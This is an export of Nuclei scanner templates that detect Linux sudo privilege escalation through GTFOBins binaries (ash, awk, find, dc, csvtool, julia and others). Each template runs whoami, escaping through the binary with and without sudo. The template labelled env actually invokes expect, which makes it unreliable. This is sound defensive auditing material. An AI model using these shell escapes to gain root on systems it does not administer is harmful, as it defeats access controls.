"privesc-ash.yaml", "content": "id: privesc-ash\n\ninfo:\n name: Ash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Ash (the Almquist shell) is a lightweight POSIX shell that can run arbitrary commands. If sudo permits ash for the current user, the invoked command runs with the target user's privileges. This template runs whoami through ash directly and via sudo and flags the host when either returns root.\n reference:\n - https://gtfobins.github.io/gtfobins/ash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo ash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 
'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022073824aab7529fe8c91f63415d0f4ef956229e29ad77d523aae3e0dda2db7cc7f0221009a6a43a288911d7294b0c5e30d209f8bd26c2bf0a3add2f2b6cc0afe5135704f:922c64590222798bb761d5b6d8e72950", "hash": "0e9c8ecb70439f81656daf9e0e1e9509", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c38" }, "name": "privesc-awk.yaml", "content": "id: privesc-awk\n\ninfo:\n name: awk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n AWK is a domain-specific language designed for text processing and typically used as a data extraction and reporting tool. Like sed and grep, it is a filter, and is a standard feature of most Unix-like operating systems.\n reference:\n - https://gtfobins.github.io/gtfobins/awk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,awk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n awk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo awk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a00463044022071c201eea9ea070ff16f969f8b05159635ab0cd518353553b47dc0712896376f022056668475360f552aba1f0d8130cb72104bd5c53615d342a38a0018bcb8a8cc96:922c64590222798bb761d5b6d8e72950", "hash": "254b701bae2d2a6ac9e7e68c8ba42f71", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c39" }, "name": "privesc-bash.yaml", "content": "id: privesc-bash\n\ninfo:\n name: Bash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a free software replacement for 
the Bourne shell. The shell's name is an acronym for Bourne Again Shell, a pun on the name of the Bourne shell that it replaces and the notion of being born again.\n reference:\n - https://gtfobins.github.io/gtfobins/bash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,bash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n bash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo bash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100b7139b5d1f14010b53722d2116b731cde04bf9f88e93d534af71430619c6519e022014318f5a98bdaf551bff8af32af0fddc900396fd795b982fb976259006f20b75:922c64590222798bb761d5b6d8e72950", "hash": "3a5bc02fbf0b8e16c9e3bbe70ef66501", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3a" }, "name": "privesc-cdist.yaml", "content": "id: privesc-cdist\n\ninfo:\n name: Cdist - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n cdist is a free software configuration management tool for Unix-like systems. 
It manages nodes over SSH using the Bourne Shell, and does not require any additional software to be installed on target nodes.\n reference:\n - https://gtfobins.github.io/gtfobins/cdist/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,cdist,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n cdist shell -s whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo cdist shell -s whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022067a276a4edab8499fe86d5520587f431af94088fec0bb96acff43c6fcc88233b022100f40168eb0bdde93de1a6a747737c96db048ef16ffa8eb6666722301eb3f0da4e:922c64590222798bb761d5b6d8e72950", "hash": "b0c5b2d1d3e346f329a6a91887295080", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3b" }, "name": "privesc-choom.yaml", "content": "id: privesc-choom\n\ninfo:\n name: choom - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n choom is a command-line utility in Linux that displays and adjusts the OOM-killer score (oom_score_adj) of a running process, or launches a command with a given score. 
Because it can launch an arbitrary command (choom -n 0 <command>), a choom that runs with elevated privileges (for example through a sudo rule) runs that command with them; this template checks for that by launching whoami through choom, with and without sudo, rather than by manipulating any memory limit.\n reference:\n - https://gtfobins.github.io/gtfobins/choom/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,choom,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n choom -n 0 whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo choom -n 0 whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950", "hash": "7c82a78fcd2ee67c55893569db326504", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3c" }, "name": "privesc-cpulimit.yaml", "content": "id: privesc-cpulimit\n\ninfo:\n name: CPUlimit - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a process. 
It can be used to control and limit the CPU usage of a specific process, which can be helpful in various scenarios such as preventing a process from consuming excessive CPU resources.\n reference:\n - https://gtfobins.github.io/gtfobins/cpulimit/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,cpulimit,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n cpulimit -l 100 -f whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo cpulimit -l 100 -f whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a004730450220230cb5251cd262f30d8d96775b9eb324039b16caa228f9e0ea8a9a22e54ccca3022100b4eebc3ca1fc773a07ad6a0acba3f2430804c8a1fbe1f4f3a7fe10cfec97c742:922c64590222798bb761d5b6d8e72950", "hash": "442a22951cf71ebad3efdef70af50c8f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3d" }, "name": "privesc-csh.yaml", "content": "id: privesc-csh\n\ninfo:\n name: csh - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n csh stands for C Shell, which is a Unix shell with C-like syntax. It is a command-line interpreter that provides a command-line interface for Unix-like operating systems. 
It has features similar to other Unix shells such as bash and sh, but with a different syntax and set of features.\n reference:\n - https://gtfobins.github.io/gtfobins/csh/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,csh,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n csh -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo csh -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202776b2a45218e0f408bac8a09800783f984d0f5263d65f4304c36046254535e9022100f7ff92e98d47577366baf47baa75b9a047b5f385964daa66c712176e1365f20a:922c64590222798bb761d5b6d8e72950", "hash": "dfa0f5df5dc7ce7d87ee6fb1621b2266", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3e" }, "name": "privesc-csvtool.yaml", "content": "id: privesc-csvtool\n\ninfo:\n name: csvtool - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. 
It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.\n reference:\n - https://gtfobins.github.io/gtfobins/csvtool/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,csvtool,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n csvtool call 'whoami;false' /etc/passwd\n\n - engine:\n - sh\n - bash\n source: |\n sudo csvtool call 'whoami;false' /etc/passwd\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100d139416288db46c8f34e489a066c9e3dd997d53a51839622350e6d40259d379f02202c588bd093b543b8e0fe14f766232fdac398e51d65498a5eeee3dd9d3bdaea99:922c64590222798bb761d5b6d8e72950", "hash": "3df35ad97e649b661e6f0769211f2cbc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c3f" }, "name": "privesc-dash.yaml", "content": "id: privesc-dash\n\ninfo:\n name: Dash - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n dash is a POSIX-compliant shell that is commonly used as the default system shell on Debian-based systems. It is designed to be a lightweight and fast shell, suitable for scripting and system administration tasks. 
It aims to be compatible with the POSIX standard for shells, providing a minimalistic and efficient environment for running shell scripts.\n reference:\n - https://gtfobins.github.io/gtfobins/dash/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,dash,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n dash -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo dash -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402206b902983b85252ee8566b012c90d8c552942e0781aafc72bc20dfb1294d6d0a80220739aaa3c21cae29f96b977cfb6e5b06da5936bf43e2174e9b67a97b07ec287fe:922c64590222798bb761d5b6d8e72950", "hash": "1f4ab22a292818258f7d06e11ab87cad", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c40" }, "name": "privesc-dc.yaml", "content": "id: privesc-dc\n\ninfo:\n name: dc - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n dc is a command-line calculator in Unix and Unix-like operating systems. It uses reverse Polish notation (RPN) and provides a simple and efficient way to perform arithmetic operations from the command line. 
It can be used for basic and advanced mathematical calculations, making it a handy tool for scripting and quick calculations in the terminal.\n reference:\n - https://gtfobins.github.io/gtfobins/dc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,dc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n dc -e '!whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo dc -e '!whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502201acdf1dadca97a95fb57db52fcdf888e35702ff28eb21f4f835d123a3771d5b7022100c92ab141e6e080b7d64def2785e6c81d163d4f1bbd235e8f38e1d77d625882f4:922c64590222798bb761d5b6d8e72950", "hash": "0547378c06b9b2978a3c49c3d01f2f34", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c41" }, "name": "privesc-distcc.yaml", "content": "id: privesc-distcc\n\ninfo:\n name: distcc - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n distcc is a distributed compilation tool for C, C++, and Objective-C. 
It allows a user to distribute compilation of these languages across several machines on a network, which can significantly speed up the compilation process for large projects.\n reference:\n - https://gtfobins.github.io/gtfobins/distcc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,distcc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n distcc whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo distcc whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100e9e5380b47cbbf1bb48a21de5671357d05c196f143686b12cae3d9632925201c022100bc2f86383e81d0d71fa76764129bcc128eca4028e5634faa4de435a06fc9f735:922c64590222798bb761d5b6d8e72950", "hash": "69f1f4660e0f0d8caefb0c1b2cbff9b8", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c42" }, "name": "privesc-elvish.yaml", "content": "id: privesc-elvish\n\ninfo:\n name: elvish - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n elvish is a Unix shell that emphasizes expressiveness and extensibility. 
It aims to provide a more user-friendly and programmable shell experience, with features such as a powerful scripting language, a rich set of data types, and a clean and consistent syntax.\n reference:\n - https://gtfobins.github.io/gtfobins/elvish/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,elvish,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n elvish -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo elvish -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100a1f071fa9a6361b4bd0b72318c713adb186b0544408f7afa7dec8c2cfd5f7a42022100810d9cc3ca386217a4fcc535d63205ef64870762732e38fdf854feef4a3b5977:922c64590222798bb761d5b6d8e72950", "hash": "356f4290471088d6a6919ae34a1d7cf6", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c43" }, "name": "privesc-enscript.yaml", "content": "id: privesc-enscript\n\ninfo:\n name: enscript - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n enscript is a command-line tool used for converting text files to PostScript format for printing. 
It provides various options for formatting and manipulating the output, making it a useful tool for generating high-quality printed documents from text files.\n reference:\n - https://gtfobins.github.io/gtfobins/enscript/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,enscript,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n enscript /dev/null -qo /dev/null -I 'whoami >&2'\n\n - engine:\n - sh\n - bash\n source: |\n sudo enscript /dev/null -qo /dev/null -I 'whoami >&2'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a0047304502202b0cc80a3f8c6f4cc2ff2ac8425d0b66a4b73ef0a723c77e140f7c7823ca6eaf022100afcb4d172cb6ec42e79b03a12de1c5b5f6e5e59b7e0648e4b52822eba9e2455d:922c64590222798bb761d5b6d8e72950", "hash": "96fea1691687ad27b7e62875332148d9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c44" }, "name": "privesc-env.yaml", "content": "id: privesc-env\n\ninfo:\n name: env - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n In Linux, the env command is used to display or modify the environment variables for a command. 
It can be used to set environment variables for a specific command or to print the current environment variables; because env executes the command given to it, an env that runs with elevated privileges (for example through a sudo rule) runs that command with them. NOTE(review): the checks in this template invoke expect (expect -c 'spawn whoami;interact'), not env, so it cannot detect the env technique and will attribute an expect result to env; the env equivalent from the GTFOBins reference is env whoami and sudo env whoami.\n reference:\n - https://gtfobins.github.io/gtfobins/env/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,env,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n expect -c 'spawn whoami;interact'\n\n - engine:\n - sh\n - bash\n source: |\n sudo expect -c 'spawn whoami;interact'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402207dac7db6e92f9149122ac4e7f725350cf0468f92e66716464588d570627ee4d802204ba57aaa26eca8123aeef474c5cf3a8310a4cfe108bae30307745a5df57762f0:922c64590222798bb761d5b6d8e72950", "hash": "cd312a0a7fa4b3f2828208ffa8f67703", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c45" }, "name": "privesc-expect.yaml", "content": "id: privesc-expect\n\ninfo:\n name: expect - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n expect is a Unix scripting and testing utility that automates interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, and more. 
It uses scripts to control interactive applications, making it useful for automating tasks that involve user input.\n reference:\n - https://gtfobins.github.io/gtfobins/expect/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,expect,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n expect -c 'spawn whoami;interact'\n\n - engine:\n - sh\n - bash\n source: |\n sudo expect -c 'spawn whoami;interact'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100d8da30cc73592bff116cb40a378563224df22bb81cc0fcf7e24e5c6d514aea12022075603006d0e05c5c833dac0f718846bd475be23ccd5adeeb4eb0fe6a270fb89b:922c64590222798bb761d5b6d8e72950", "hash": "6874c97d279dccbac9c54ffe2f202505", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c46" }, "name": "privesc-find.yaml", "content": "id: privesc-find\n\ninfo:\n name: find - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n The find command in Linux is used to search for files and directories in a directory hierarchy based on various criteria such as name, type, size, and permissions. It is a powerful tool for locating files and performing operations on them, such as executing commands or applying changes.\n reference:\n - https://gtfobins.github.io/gtfobins/find/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,find,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n find . -exec whoami \\; -quit\n\n - engine:\n - sh\n - bash\n source: |\n sudo find . 
-exec whoami \\; -quit\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950", "hash": "182cbf57dae590d7b32c2cc2308c159d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c47" }, "name": "privesc-fish.yaml", "content": "id: privesc-fish\n\ninfo:\n name: fish - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n fish is a user-friendly command-line shell for Unix-like operating systems. It provides features such as syntax highlighting, autosuggestions, and a built-in scripting language. Fish aims to be easy to use and learn, making it a popular choice for both interactive shell usage and scripting.\n reference:\n - https://gtfobins.github.io/gtfobins/fish/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,fish,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n fish -c 'whoami'\n\n - engine:\n - sh\n - bash\n source: |\n sudo fish -c 'whoami'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100fc1295d0916f1aa41b0e5372705deb27042429a246f15d9afa5efe9fa8e64e5202201b1a16a397a1465530a084cb30d64536bdcb606c77ba9ee5dcb26c8300722f00:922c64590222798bb761d5b6d8e72950", "hash": "9ddc2b17c56a6676730f7831153894b9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c48" }, "name": 
"privesc-flock.yaml", "content": "id: privesc-flock\n\ninfo:\n name: Flock - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n flock is a command-line utility in Unix-like operating systems that is used to manage file locks. It can be used to synchronize access to a file among multiple processes, preventing conflicts and ensuring data integrity. Additionally, flock can be used in shell scripts to control access to critical sections of code.\n reference:\n - https://gtfobins.github.io/gtfobins/flock/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,flock,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n flock -u / whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo flock -u / whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100de7de6316a36966e591a532e458496e3deafdcf99db9d1b6e06ba8804b5156bf022035df063cb6d81a55b81577f7e7cc8f167990d113dbc9b870d5c388a0c7feb8fc:922c64590222798bb761d5b6d8e72950", "hash": "48085a4de71f36c5d37e6ba96d24a577", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c49" }, "name": "privesc-gawk.yaml", "content": "id: privesc-gawk\n\ninfo:\n name: gawk - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n gawk is the GNU implementation of the AWK programming language. It is a powerful text processing tool that allows for pattern scanning and processing of text files. 
gawk is commonly used for data extraction, reporting, and manipulation tasks in shell scripts and command-line environments.\n reference:\n - https://gtfobins.github.io/gtfobins/gawk/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,gawk,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n gawk 'BEGIN {system(\"whoami\")}'\n\n - engine:\n - sh\n - bash\n source: |\n sudo gawk 'BEGIN {system(\"whoami\")}'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100c4027738da47964b3c3ed949b3583c0ddc7553f648cf97255cb9529903a8c4f6022100aeec04af6a33ede7e65f9b18a43c832bce2ad79217b73934ae9af56b247aaf50:922c64590222798bb761d5b6d8e72950", "hash": "0a512fa274b04da88f736b00f908ce52", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4a" }, "name": "privesc-grc.yaml", "content": "id: privesc-grc\n\ninfo:\n name: grc - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n grc is a command-line utility that enhances the output of other commands with color and style. It is commonly used to improve the readability of command output by adding color highlighting and formatting. 
grc can be configured to work with various commands and is often used to make log files and command output easier to interpret.\n reference:\n - https://gtfobins.github.io/gtfobins/grc/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,grc,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n grc --pty whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo grc --pty whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 490a0046304402201157d0174dbcda2e8968ef3fc2ffb4185c7892c217fad0be4f9c6f7d5076e76202203f73255a3c73317a66097d5a835ea51e0f00e38c38fd2067ac468ad5afa537a9:922c64590222798bb761d5b6d8e72950", "hash": "e0a99e57eaaeaf21972557e8a86a3320", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4b" }, "name": "privesc-ionice.yaml", "content": "id: privesc-ionice\n\ninfo:\n name: ionice - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n ionice is a command-line utility in Linux that is used to set or get the I/O scheduling class and priority for a program. 
It allows users to control the I/O priority of a process, which can be useful for managing system resources and improving overall system performance.\n reference:\n - https://gtfobins.github.io/gtfobins/ionice/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,ionice,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n ionice whoami\n\n - engine:\n - sh\n - bash\n source: |\n sudo ionice whoami\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4b0a00483046022100d9c0c0313cfec8a4e961cb41292292259e48ac63ae786404c9987e32e7cff66b022100da11803df69fe86103fc73191da5b16a659cca239ba3183af3a0faaee2bf6482:922c64590222798bb761d5b6d8e72950", "hash": "b1c404fa289e4f8e98b7ee1129d62f7f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4c" }, "name": "privesc-julia.yaml", "content": "id: privesc-julia\n\ninfo:\n name: Julia - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n Julia is a high-level, high-performance programming language for technical computing. It is designed for numerical and scientific computing, but it is also used for general-purpose programming. 
Julia is known for its speed and ease of use, and it has a growing community of users and developers.\n reference:\n - https://gtfobins.github.io/gtfobins/julia/\n metadata:\n verified: true\n max-request: 3\n tags: code,linux,julia,privesc,local\n\nself-contained: true\ncode:\n - engine:\n - sh\n - bash\n source: |\n whoami\n\n - engine:\n - sh\n - bash\n source: |\n julia -e 'run(`whoami`)'\n\n - engine:\n - sh\n - bash\n source: |\n sudo julia -e 'run(`whoami`)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: code_1_response\n words:\n - \"root\"\n negative: true\n\n - type: dsl\n dsl:\n - 'contains(code_2_response, \"root\")'\n - 'contains(code_3_response, \"root\")'\n condition: or\n# digest: 4a0a00473045022100da869705e57f9c47830956a1baf810515df6720b8a0bad243237ea03d4cb3c6a022065101ef22cf2d9f15db6ff54329a952fdc051c7850714c2e19c9b590bcdcd3cb:922c64590222798bb761d5b6d8e72950", "hash": "05178e8bd11fd2f0de5110caccdb5cdc", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307c4d" }, "name": "privesc-lftp.yaml", "content": "id: privesc-lftp\n\ninfo:\n name: lftp - Privilege Escalation\n author: daffainfo\n severity: high\n description: |\n lftp is a command-line file transfer program for Unix-like systems. It supports various protocols such as FTP, HTTP, SFTP, and FISH, and provides a range of features for file transfer and mirroring. 
